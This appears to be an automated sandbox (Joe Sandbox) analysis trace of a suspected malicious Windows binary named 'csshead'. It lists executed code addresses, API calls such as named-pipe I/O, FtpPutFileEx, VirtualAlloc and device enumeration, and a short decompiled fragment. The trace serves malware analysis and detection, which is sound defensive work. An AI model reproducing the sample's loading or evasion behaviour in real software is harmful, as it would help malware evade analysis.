    0x0041d631
    0x0041d638
    0x0041d63c
    0x0041d63c
    0x0041d648
    0x0041d65e
    0x0041d65e
    0x0041d65e
    0x0041d64a
    0x0041d651
    0x0041d651
    0x0041d665
    0x0041d66e
    0x0041d670
    0x0041d678
    0x0041d679
    0x0041d67b
    0x0041d67b
    0x0041d683
    0x0041d70f
    0x0041d718
    0x0041d745
    0x0041d74b
    0x0041d751
    0x0041d759
    0x0041d764
    0x0041d768
    0x0041d76f
    0x0041d773
    0x0041d77a
    0x0041d77e
    0x0041d784
    0x0041d79c
    0x0041d79e
    0x0041d7a4
    0x0041d7a6
    0x0041d7a8
    0x0041d7a8
    0x0041d7aa
    0x0041d7c0
    0x0041d7c2
    0x0041d7c4
    0x0041d7c6
    0x0041d7d0
    0x0041d7d2
    0x0041d7d2
    0x0041d7d4
    0x0041d7e7
    0x0041d7e9
    0x0041d7eb
    0x0041d7ed
    0x0041d7fa
    0x0041d7fc
    0x0041d806
    0x0041d808
    0x0041d808
    0x0041d81f
    0x0041d821
    0x0041d823
    0x0041d829
    0x0041d840
    0x0041d842
    0x0041d844
    0x0041d85c
    0x0041d85e
    0x0041d860
    0x0041d862
    0x0041d876
    0x0041d878
    0x0041d87a
    0x0041d87c
    0x0041d887
    0x0041d889
    0x0041d896
    0x0041d898
    0x0041d89a
    0x0041d89c
    0x0041d8b0
    0x0041d8b0
    0x0041d8b2
    0x0041d8bf
    0x0041d8bf
    0x0041d87a
    0x0041d860
    0x0041d8c1
    0x0041d8c8
    0x0041d8ca
    0x0041d8d2
    0x0041d8d2
    0x0041d8d4
    0x0041d8d8
    0x0041d8da
    0x0041d8e2
    0x0041d8e2
    0x0041d8da
    0x0041d8e4
    0x0041d8f1
    0x0041d8f3
    0x0041d8fd
    0x0041d8ff
    0x0041d909
    0x0041d90b
    0x0041d911
    0x0041d916
    0x0041d91f
    0x0041d929
    0x0041d92f
    0x0041d93a
    0x0041d93e
    0x0041d94d
    0x0041d958
    0x0041d95a
    0x0041d961
    0x0041d969
    0x0041d969
    0x0041d96b
    0x0041d96b
    0x0041d982
    0x0041d987
    0x0041d98b
    0x0041d999
    0x0041d9a0
    0x0041d9ab
    0x0041d9b2
    0x0041d9b8
    0x0041d9ba
    0x0041d9c5
    0x0041d9bc
    0x0041d9bc
    0x0041d9bc
    0x0041d9d5
    0x0041d9da
    0x0041d9e8
    0x0041d9ef
    0x0041d9fa
    0x0041da00
    0x0041da0f
    0x0041da1e
    0x0041da2d
    0x0041da38
    0x0041da4d
    0x0041da53
    0x0041da59
    0x0041da62
    0x0041da62
    0x0041da68
    0x0041da6c
    0x0041da6e
    0x0041db16
    0x0041db1b
    0x0041db29
    0x0041db2e
    0x0041db34
    0x0041db3c
    0x0041db9d
    0x0041db9e
    0x0041db9f
    0x0041dba4
    0x0041dba7
    0x0041db3e
    0x0041db45
    0x0041db50
    0x0041db57
    0x0041db5e
    0x0041db65
    0x0041db6c
    0x0041db73
    0x0041db7a
    0x0041db7f
    0x0041db86
    0x0041db88
    0x0041db88
    0x0041dbae
    0x0041dbb3
    0x0041dbb9
    0x0041da74
    0x0041da80
    0x0041da86
    0x0041da88
    0x0041da8a
    0x00000000
    0x00000000
    0x0041da92
    0x0041da94
    0x0041da96
    0x0041daf5
    0x0041db07
    0x0041dbbf
    0x0041dbc4
    0x0041dbc9
    0x0041dbdb
    0x0041dbdb
    0x0041da9e
    0x0041daa0
    0x0041daa2
    0x0041db0e
    0x0041db0e
    0x00000000
    0x0041db0e
    0x0041daaa
    0x0041daac
    0x0041daae
    0x00000000
    0x00000000
    0x0041dabe
    0x0041dac0
    0x0041dac3
    0x0041dac5
    0x00000000
    0x00000000
    0x00000000
    0x0041dac7
    0x0041dad2
    0x0041dae4
    0x0041dae4
    0x00000000
    0x0041d694
    0x0041d69b
    0x0041d6a3
    0x0041d6a7
    0x0041d6ab
    0x0041d6af
    0x0041d6ba
    0x00000000
    0x00000000
    0x0041d6d7
    0x0041d6dd
    0x0041d6dd
    0x0041d6ed
    0x0041d6fa
    0x0041d708
    0x00000000
    0x0041d708
    0x0041d683
    0x0041d590
    0x0041d3c8
    0x0041d3cc
    0x0041d3d2
    0x0041d3d6
    0x0041d3df
    0x0041d3e1
    0x0041d3e3
    0x0041d3ed
    0x0041d3ee
    0x0041d3f1
    0x0041d3f4
    0x0041d3fd
    0x0041d3ff
    0x0041d408
    0x0041d413
    0x0041d41a
    0x0041d41b
    0x0041d422
    0x0041d425
    0x0041d42d
    0x0041d431
    0x0041d435
    0x0041d439
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0041d362
    0x0041d362
    0x0041d362
    0x0041d36a
    0x0041d37a
    0x0041d37c
    0x0041d37c
    0x0041d37c
    0x0041d382
    0x0041d390
    0x0041d395
    0x0041d396
    0x00000000

    APIs
    • EnumPrintersA.WINSPOOL.DRV(00000002,00000000,00000002,00000000,00000000,?,?), ref: 0041C981
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0042A0F0,?,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6), ref: 00422A5D
    • EnumPrintersA.WINSPOOL.DRV(00000002,00000000,00000002,00000000,?,?,?), ref: 0041C9A5
    • OpenColorProfileA.MSCMS ref: 0041CA46
    • OpenColorProfileA.MSCMS(?,00000001,00000001,00000003), ref: 0041CA66
    • EnumPrintersA.WINSPOOL.DRV(00000002,00000000,00000002,00000000,00000000,?,?,00000001,00000001,00000003,00000000,?,?,?), ref: 0041CAA5
    • EnumPrintersA.WINSPOOL.DRV(00000002,00000000,00000002,00000000,00000000,?,?,?,00000001,00000001,00000003,00000000,?,?,?), ref: 0041CAC9
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,00000000,?,?,?,00000001,00000001,00000003,00000000,?,?,?), ref: 0041CAE5
    • LoadIconA.USER32(00000000,00000064), ref: 0041CAF0
    • 800001A3.OLEAUT32 ref: 0041CB1D
    • GetHGlobalFromStream.OLE32(?,?), ref: 0041CB55
    • LoadLibraryA.KERNELBASE(open), ref: 0041CB7D
    • LoadIconA.USER32(00000000,00000064), ref: 0041CB82
    • 800001A3.OLEAUT32(?,?,00000001,?), ref: 0041CBA9
    • GetHGlobalFromStream.OLE32(?,?), ref: 0041CBE1
    • EnumPrintersA.WINSPOOL.DRV(00000002,00000000,00000002,00000000,00000000,00000000,?), ref: 0041CC53
    • EnumPrintersA.WINSPOOL.DRV(00000002,00000000,00000002,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041CC77
    • GetDC.USER32(00000000), ref: 0041CD06
    • CreateEventA.KERNEL32(00000058,00000058,00000058,Xstore), ref: 0041CD17
    • GetClassLongA.USER32(00000058,000000E6), ref: 0041CD4A
    • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 0041CD5F
    • GetCursorPos.USER32(0000000A), ref: 0041CD6A
    • GetCursorPos.USER32(?), ref: 0041CD89
    • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 0041CDB9
    • CommDlgExtendedError.COMDLG32 ref: 0041CE3F
    • WaitForSingleObject.KERNEL32(?,00000BB7,00000000), ref: 0041CFB9
    • WaitNamedPipeA.KERNEL32(\\.\pipe\pipe,000000FF), ref: 0041D097
    • CreateFileA.KERNELBASE(\\.\pipe\pipe,C0000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0B7
    • SetNamedPipeHandleState.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0D3
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0E4
    • WriteFile.KERNELBASE(00000000,00433E5C,00000030,?,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D101
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D108
    • ReadFile.KERNELBASE(00000000,?,00000030,?,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D11C
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D123
    • LookupAccountNameA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 0041D16A
    • GetLastError.KERNEL32 ref: 0041D172
    • GetLastError.KERNEL32 ref: 0041D17B
    • GetLastError.KERNEL32 ref: 0041D190
    • LocalAlloc.KERNEL32(00000040,?), ref: 0041D1A8
    • GetLastError.KERNEL32 ref: 0041D1B0
    • LocalAlloc.KERNEL32(00000040,?), ref: 0041D1C7
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041D1CF
    • LookupAccountNameA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 0041D1FB
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041D201
      • Part of subcall function 004242F0: __ftbuf.LIBCMT ref: 00424367
    • LocalFree.KERNEL32(00000000), ref: 0041D216
    • SetStretchBltMode.GDI32(00000000,00000004), ref: 0041D2F8
    • SetAbortProc.GDI32(00000000,Function_000047A0), ref: 0041D323
    • DrawFrameControl.USER32(?,?,00000004,00004210), ref: 0041D34C
    • LoadImageA.USER32(?,?,00000000,00000000,00000000,00000000), ref: 0041D3B1
    • SetWindowLongA.USER32(00000000,000000EC,00000080), ref: 0041D3DF
      • Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EC), ref: 00417F10
      • Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EC), ref: 00417F23
      • Part of subcall function 00417E60: SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
      • Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
      • Part of subcall function 00417E60: OleUninitialize.OLE32 ref: 00417F51
      • Part of subcall function 00417E60: OleInitialize.OLE32(00000000), ref: 00417F5E
      • Part of subcall function 00417E60: GetWindowTextLengthA.USER32(?), ref: 00417F68
      • Part of subcall function 00417E60: GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
      • Part of subcall function 00417E60: SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
      • Part of subcall function 00417E60: GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
      • Part of subcall function 00417E60: GlobalLock.KERNEL32(00000000), ref: 00417FF7
      • Part of subcall function 00417E60: GlobalUnlock.KERNEL32(00000000), ref: 00418012
      • Part of subcall function 00417E60: CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0041801F
      • Part of subcall function 00417E60: lstrlenA.KERNEL32(00000000), ref: 00418031
      • Part of subcall function 00417E60: SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
      • Part of subcall function 00417E60: DefWindowProcA.USER32(?,?,?,?), ref: 00418176
    • CreateEventA.KERNEL32(00000000,00000000,00000000,denfers,?,00000005,?,00000005), ref: 0041D577
    • GetCursorPos.USER32(00000005), ref: 0041D586
    • GetCursorPos.USER32(?), ref: 0041D5B8
    • DragQueryFileA.SHELL32(00000000,000000FF,?,00000104), ref: 0041D5E1
    • GetNumberOfPhysicalMonitorsFromHMONITOR.DXVA2(00000000,?), ref: 0041D67B
    • CreateRectRgnIndirect.GDI32(?), ref: 0041D6AF
    • WaitForSingleObject.KERNEL32(?,00000BB6), ref: 0041D6ED
    • EnableMenuItem.USER32(?,0000000C,00000000), ref: 0041D74B
    • CoInitializeEx.OLE32(00000000,00000002), ref: 0041D77E
    • CoCreateInstance.OLE32(00433FFC,00000000,00000001,0043A508,?), ref: 0041D79C
    • CoUninitialize.OLE32 ref: 0041D7A8
    • CoUninitialize.OLE32 ref: 0041D7D2
    • CoUninitialize.OLE32 ref: 0041D808
    • CoCreateInstance.OLE32(?,00000000,00000001,0043A4F8,00000000), ref: 0041D81F
    • CoCreateInstance.OLE32(0043400C,00000000,00000001,0043A4F8,?), ref: 0041D85C
    • CoUninitialize.OLE32 ref: 0041D90B
    • GetDlgItem.USER32(00000000,00000000), ref: 0041D91F
    • OleInitialize.OLE32(00000000), ref: 0041D929
    • CoLockObjectExternal.OLE32(00000000,00000001,00000000), ref: 0041D93A
    • RegisterDragDrop.OLE32(00000000,00000000), ref: 0041D93E
    • GetTopWindow.USER32(00000000), ref: 0041D946
    • RevokeDragDrop.OLE32(00000000), ref: 0041D94D
    • CoLockObjectExternal.OLE32(00000000,00000000,00000001), ref: 0041D958
    • OleUninitialize.OLE32 ref: 0041D96B
    • SetMenuItemInfoA.USER32 ref: 0041D9B2
    • GetLastError.KERNEL32 ref: 0041D9BC
    • DrawMenuBar.USER32(00000000), ref: 0041D9C5
    • GetMenuItemInfoA.USER32 ref: 0041D9FA
    • BeginPaint.USER32(00000000,?), ref: 0041DA0F
    • EndPaint.USER32(00000000,?), ref: 0041DA1E
    • GetClientRect.USER32 ref: 0041DA38
    • EnumDateFormatsA.KERNEL32(?,00000400,00000001), ref: 0041DA4D
    • lstrcmpiA.KERNEL32(?,UnregServer), ref: 0041DA86
    • lstrcmpiA.KERNEL32(?,RegServer), ref: 0041DA92
    • lstrcmpiA.KERNEL32(?,Automation), ref: 0041DA9E
    • lstrcmpiA.KERNEL32(?,Embedding), ref: 0041DAAA
      • Part of subcall function 00403D10: CharNextA.USER32(?), ref: 00403D3B
      • Part of subcall function 00403D10: CharNextA.USER32(?), ref: 00403D42
      • Part of subcall function 00403D10: CharNextA.USER32(?), ref: 00403D51
      • Part of subcall function 0040F280: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040F2F6
      • Part of subcall function 0040F280: lstrlenA.KERNEL32(?), ref: 0040F33C
      • Part of subcall function 0040F280: GetModuleHandleA.KERNEL32(00000000,?,00000003,?), ref: 0040F3DB
      • Part of subcall function 0040F280: lstrlenW.KERNEL32(?,?,?,?,?,00000003,?), ref: 0040F443
      • Part of subcall function 00405200: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040520C
      • Part of subcall function 00405200: CloseHandle.KERNEL32(00000000), ref: 0040524A
      • Part of subcall function 00405010: CoRegisterClassObject.OLE32(?,?,?,?,?), ref: 00405062
    • CoResumeClassObjects.OLE32 ref: 0041DB2E
    • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041DBC9
      • Part of subcall function 004050E0: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 004050FD
      • Part of subcall function 004050E0: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040511F
      • Part of subcall function 004050E0: TranslateMessage.USER32(?), ref: 0040513C
      • Part of subcall function 004050E0: DispatchMessageA.USER32(?), ref: 00405143
      • Part of subcall function 004198E0: EnterCriticalSection.KERNEL32 ref: 0041991C
      • Part of subcall function 004198E0: GetCurrentThreadId.KERNEL32 ref: 00419922
      • Part of subcall function 004198E0: LeaveCriticalSection.KERNEL32(-00000010,-00000010,-00000010), ref: 00419942
      • Part of subcall function 004198E0: InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
      • Part of subcall function 004198E0: ShowWindow.USER32(?,?), ref: 004199EA
      • Part of subcall function 004050A0: CoRevokeClassObject.OLE32(?), ref: 004050C1
    • Sleep.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0041DBB9
      • Part of subcall function 004093B0: CloseHandle.KERNEL32(?), ref: 004093BC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd

    Control-flow Graph

    (Graph image not recoverable: function at 419d20, basic blocks 419d20-419f20 through 41c8fa-41c959 and 41dbde-41dc07, with executed / not-executed block colouring. The API calls on its nodes are listed under APIs below.)
    APIs
    • CoInitialize.OLE32(00000000), ref: 00419D2C
    • NtdllDefWindowProc_A.NTDLL(00000000,00000000,00000000,00000000), ref: 00419D3A
      • Part of subcall function 00418480: RtlEnterCriticalSection.NTDLL(00442B64), ref: 0041848C
      • Part of subcall function 00418480: RegisterClassExA.USER32 ref: 00418531
      • Part of subcall function 00418480: RegisterClassExA.USER32 ref: 004185D5
      • Part of subcall function 00418480: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00418604
    • GetCommandLineA.KERNEL32 ref: 00419DA4
    • CreateMenu.USER32 ref: 00419EAE
    • LoadBitmapA.USER32(?,00433E0C), ref: 00419EDC
    • AppendMenuA.USER32(00000000,00000014,?,00000000), ref: 00419EEC
    • BeginDeferWindowPos.USER32(00442A98), ref: 00419F07
    • CreateMetaFileA.GDI32(?), ref: 00419F2B
    • SetBrushOrgEx.GDI32(00000000,00000001,00000000,00000000), ref: 00419F3A
    • LoadImageA.USER32(?,?,00000001,00000010,00000010,00000000), ref: 00419F6A
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    • FtpPutFileEx.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041A00D
    • GetSysColorBrush.USER32(0000000F), ref: 0041A084
    • FrameRect.USER32(00000000,?,00000000), ref: 0041A094
    • GlobalAlloc.KERNELBASE(00001000,00000838), ref: 0041A0C0
    • GetLastError.KERNEL32 ref: 0041A101
    • GetIconInfo.USER32(00000000,?), ref: 0041A12D
    • GetIconInfo.USER32(00000000,?), ref: 0041A14D
    • mmioSetInfo.WINMM(0000002F,?,0000002F), ref: 0041A422
    • mmioAscend.WINMM(0000002F,?,0000002F), ref: 0041A457
    • GetSystemInfo.KERNELBASE(?), ref: 0041A47E
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0041A4E5
    • SetConsoleCtrlHandler.KERNEL32(00442AA0,00000001), ref: 0041A4F3
    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0041A572
    • CopyImage.USER32(?,00000000,?,00442AA4,00000008), ref: 0041A93E
    • DrawMenuBar.USER32(00000061), ref: 0041AA1D
    • FindResourceA.KERNEL32(00000061,?,00433E2C), ref: 0041AA31
    • VirtualAlloc.KERNELBASE(00000000,00342AA0,00003000,00000022), ref: 0041AA4F
    • LoadLibraryA.KERNELBASE(0043584C), ref: 0041AAAF
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041AAE1
    • LoadLibraryA.KERNELBASE(0043584C,?,00000001,?), ref: 0041AB71
    • LoadLibraryA.KERNELBASE(0043584C,?,?,?,?,00000001,?), ref: 0041AC29
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • LoadLibraryA.KERNELBASE(0043584C,00000002,00000000), ref: 0041AE48
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041AE74
    • LoadLibraryA.KERNELBASE(0043584C,00000002,00000000,00000002,00000000,00000000,?,?,?,00000003,?,00000001,00000001,00000003,?,?), ref: 0041AF4B
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041AF7D
    • LoadLibraryA.KERNELBASE(0043584C,?,00000001,00000001,00000003), ref: 0041B0C5
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041B0F1
    • LoadLibraryA.KERNELBASE(0043584C,00000002,00000000), ref: 0041B4E7
    • LoadIconA.USER32(00000000,00000064), ref: 0041B4F0
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041B51A
    • LoadLibraryA.KERNELBASE(0043584C,00000002,00000000,00000002,00000000,?,?,?,00000003,00000001,00000000), ref: 0041B6B1
    • LoadLibraryA.KERNELBASE(0043584C), ref: 0041B72C
    • LoadLibraryA.KERNELBASE(0043584C,00000000,?,?,?,00000001,00000001,00000003,?,?,?,?,?,00000001,?), ref: 0041B90F
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041B93B
    • LoadLibraryA.KERNELBASE(0043584C), ref: 0041B9DE
    • LoadIconA.USER32(00000000,00000064), ref: 0041B9E3
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041BA0E
    • LoadLibraryA.KERNELBASE(0043584C,00000002,00000000,00000002,00000000,00000000,?,?,?,?,?,?), ref: 0041BB90
    • LoadIconA.USER32(00000000,00000064), ref: 0041BB95
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041BBC0
    • LoadLibraryA.KERNELBASE(0043584C,?,00000001,00000001,00000003), ref: 0041C08A
    • LoadIconA.USER32(00000000,00000064), ref: 0041C08F
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041C0BA
    • LoadLibraryA.KERNELBASE(0043584C,00000002,00000000,00000002,00000000,?,?,?,00000003,00000000,?,?,?,00000003,00000000,00000000), ref: 0041C2AB
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C2DD
    • LoadLibraryA.KERNELBASE(0043584C,00000002,00000000,00000002,00000000,00000000,?,?,?), ref: 0041C3B6
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C3E2
    • LoadLibraryA.KERNELBASE(0043584C,00000001,00000001,00000003,?,00000001,00000001,00000003,?,?,?,00000001,?), ref: 0041C5C1
    • LoadIconA.USER32(00000000,00000064), ref: 0041C5C6
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C5F1
    • LoadLibraryA.KERNELBASE(0043584C,?,?,?,?,?,?,?,?,?,00000001,?,?,?,?,00000001), ref: 0041C6E7
    • LoadIconA.USER32(00000000,00000064), ref: 0041C6EC
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C717
    • LoadLibraryA.KERNELBASE(0043584C,00000002,00000000), ref: 0041C8B9
    • LoadIconA.USER32(00000000,00000064), ref: 0041C8BE
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C8E9
      • Part of subcall function 00423991: RaiseException.KERNEL32(?,?,00423990,000000F4,?,?,?,?,00423990,000000F4,0043C9F8,00442BF0,000000F4,?,?,00000000), ref: 004239D3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • LoadLibraryA.KERNELBASE(0043584C,00000002,00000000,00000002,00000000,00000000,?,?,?,00000001,00000001,00000003,00000000,?,?,?), ref: 0041CAE5
    • LoadLibraryA.KERNELBASE(0043584C), ref: 0041CB7D
    • CreateEventA.KERNEL32(00000058,00000058,00000058,00433E30), ref: 0041CD17
    • GetClassLongA.USER32(00000058,000000E6), ref: 0041CD4A
    • SetClassLongA.USER32(00442AA8,000000E6,00000000), ref: 0041CD5F
    • GetCursorPos.USER32(0000000A), ref: 0041CD6A
    • GetCursorPos.USER32(?), ref: 0041CD89
    • WaitForSingleObject.KERNEL32(?,00000BB7,00000000), ref: 0041CFB9
    • WaitNamedPipeA.KERNEL32(00433E3C,000000FF,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041D097
    • CreateFileA.KERNELBASE(00433E4C,C0000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0B7
    • SetNamedPipeHandleState.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0D3
    • WriteFile.KERNELBASE(00000000,00433E5C,00000030,?,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D101
    • ReadFile.KERNELBASE(00000000,?,00000030,?,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D11C
    • LookupAccountNameA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 0041D16A
    • LocalFree.KERNEL32(00000000), ref: 0041D216
      • Part of subcall function 004242F0: __woutput_l.LIBCMT ref: 00424356
      • Part of subcall function 004242F0: __ftbuf.LIBCMT ref: 00424367
    • SetAbortProc.GDI32(00000000,004047A0), ref: 0041D323
    • DrawFrameControl.USER32(?,?,00000004,00004210), ref: 0041D34C
    • LoadImageA.USER32(?,?,00000000,00000000,00000000,00000000), ref: 0041D3B1
      • Part of subcall function 00417E60: SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
      • Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
      • Part of subcall function 00417E60: OleUninitialize.OLE32 ref: 00417F51
      • Part of subcall function 00417E60: OleInitialize.OLE32(00000000), ref: 00417F5E
      • Part of subcall function 00417E60: GetWindowTextLengthA.USER32(?), ref: 00417F68
      • Part of subcall function 00417E60: GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
      • Part of subcall function 00417E60: SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
      • Part of subcall function 00417E60: GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
      • Part of subcall function 00417E60: GlobalFix.KERNEL32(00000000), ref: 00417FF7
      • Part of subcall function 00417E60: GlobalUnWire.KERNEL32(00000000), ref: 00418012
      • Part of subcall function 00417E60: lstrlen.KERNEL32(00000000), ref: 00418031
      • Part of subcall function 00417E60: SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
      • Part of subcall function 00417E60: NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00418176
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00433E64), ref: 0041D577
    • GetCursorPos.USER32(00000005), ref: 0041D586
    • GetCursorPos.USER32(?), ref: 0041D5B8
    • DragQueryFile.SHELL32(00000000,000000FF,?,00000104), ref: 0041D5E1
    • CreateRectRgnIndirect.GDI32(?), ref: 0041D6AF
    • WaitForSingleObject.KERNEL32(?,00000BB6), ref: 0041D6ED
    • EnableMenuItem.USER32(?,0000000C,00000000), ref: 0041D74B
    • GetDlgItem.USER32(00000000,00442A98), ref: 0041D91F
    • OleInitialize.OLE32(00000000), ref: 0041D929
    • RegisterDragDrop.OLE32(00000000,00442AA0), ref: 0041D93E
    • GetTopWindow.USER32(00000000), ref: 0041D946
    • RevokeDragDrop.OLE32(00000000), ref: 0041D94D
    • OleUninitialize.OLE32 ref: 0041D96B
    • SetMenuItemInfoA.USER32 ref: 0041D9B2
    • GetLastError.KERNEL32 ref: 0041D9BC
    • DrawMenuBar.USER32(00000000), ref: 0041D9C5
    • GetMenuItemInfoA.USER32 ref: 0041D9FA
    • BeginPaint.USER32(00442AA8,?), ref: 0041DA0F
    • EndPaint.USER32(00442AA8,?), ref: 0041DA1E
    • GetClientRect.USER32 ref: 0041DA38
    • EnumDateFormatsA.KERNEL32(?,00000400,00000001), ref: 0041DA4D
      • Part of subcall function 004198E0: RtlEnterCriticalSection.NTDLL ref: 0041991C
      • Part of subcall function 004198E0: GetCurrentThreadId.KERNEL32 ref: 00419922
      • Part of subcall function 004198E0: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00419942
      • Part of subcall function 004198E0: InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
      • Part of subcall function 004198E0: ShowWindow.USER32(?,?), ref: 004199EA
    • Sleep.KERNEL32(00442B20,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041DBB9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00406EEC(void* __ecx) {
    				intOrPtr _v8;
    				struct HINSTANCE__* _v12;
    				void* _v16;
    				void* _v20;
    				void* _v24;
    				CHAR* _v28;
    				void* _v32;
    				void* _v161;
    				void* _v192;
    				intOrPtr _t54;
    				struct HINSTANCE__* _t57;
    
    				_v8 = 0;
    				_t54 =  *0x40a55c; // 0x406ed0
    				_v28 = E00403F38(_t54);
    				_t57 = LoadLibraryA(_v28); // executed
    				_v12 = _t57;
    				E00401440(_v28);
    				if (_v12 == 0) goto L7;
    			}

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 00406F0B
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • SetupDiGetClassDevsA.SETUPAPI(0040A014,00000000,00000000,00000002), ref: 00406F79
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00406FA7
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 00406FCE
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00406FE7
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00406FF1
    • SetupDiGetClassDevsA.SETUPAPI(0040A024,00000000,00000000,00000002), ref: 00407028
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00407056
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 0040707D
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00407096
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 004070A0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
